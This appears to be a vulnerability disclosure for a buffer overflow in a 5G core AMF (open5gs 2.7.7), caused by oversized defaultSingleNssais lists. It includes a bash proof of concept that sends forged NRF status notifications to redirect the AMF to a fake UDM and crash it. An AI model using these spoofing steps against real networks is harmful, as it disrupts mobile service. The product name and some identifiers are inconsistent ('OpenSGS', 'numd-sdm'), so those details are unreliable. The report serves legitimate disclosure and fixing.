OpenSGS AMF Buffer Overflow Vulnerability Analysis

# OpenSGS AMF Buffer Overflow Vulnerability Summary ## Vulnerability Overview * **Vulnerability ID**: #4403 * **Vulnerability Type**: Buffer Overflow / Memory Corruption * **Trigger Condition**: Occurs during a real UE registration process when the `am-data` response from `numd-sdm` contains an excessive number of `defaultSingleNssais` entries. * **Root Cause**: The code lacks boundary checks when copying `defaultSingleNssais` entries into `amf_ue->num_of_slice`. The target array `ogs_slice_data_t slice[OGS_MAX_NUM_OF_SLICE]` has a fixed size, but an attacker can send entries exceeding this limit, resulting in out-of-bounds memory writes. * **Impact**: Memory corruption causes the registration process to enter an abnormal state, ultimately triggering an assertion failure (`gmm_state_registered`) and causing the AMF process to crash (Exit code 134). ## Scope of Impact * **Affected Component**: OpenSGS AMF (Access and Mobility Management Function) * **Affected Version**: v2.7.7 * **Attack Vector**: 5G registration process initiated by an external UE. ## Remediation * **Expected Behavior**: The AMF should reject lists containing an excessive number of `defaultSingleNssais` entries or limit the number of copied entries to within `OGS_MAX_NUM_OF_SLICE`. * **Current Status**: Unfixed (Open). ## POC / Exploit Code **1. Start Environment (Docker):** ```bash docker start db ausf udm udr pcf amf upf nssf ``` **2. Replace the real UDM in the AMF local cache with a fake UDM:** ```bash AMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' amf) curl -H'content-type: application/json' \ -H'content-type: application/json' \ -X POST "http://$AMF_IP/nrf-nf-v1/nf-status-notify" \ -d '{"event": "NF_DEREGISTERED", "nfInstanceId": "http://nrf.open5gs.org/nrf/nf-v1/instances/4568f3be-38..."}' curl -H'content-type: application/json' \ -H'content-type: application/json' \ -X POST "http://$AMF_IP/nrf-nf-v1/nf-status-notify" \ -d '{"event": "NF_REGISTERED", "nfInstanceId": "http://10.33.33.1:8083/nrf-nf-v1/instances/fake-ue-amf"}' ``` **3. Control Experiment: Configure the fake UDM for a single normal registration:** ```bash printf 'control!\n' > /home/ubuntu/open5gs_277/.audit/tmp/amf_fake_udm.mode docker restart amf-audit-gdb amf-audit-ue docker logs --tail 60 amf-audit-ue docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf ``` **4. Malicious Experiment: Change the fake UDM mode to return 32 `defaultSingleNssais` entries:** ```bash printf 'am-data-slice-overflow!\n' > /home/ubuntu/open5gs_277/.audit/tmp/amf_fake_udm.mode docker restart amf-audit-gdb amf-audit-ue docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf docker logs --tail 120 amf ```

Goal Reached Thanks to every supporter — we hit 100%!

OpenSGS AMF Buffer Overflow Vulnerability Analysis

More from this source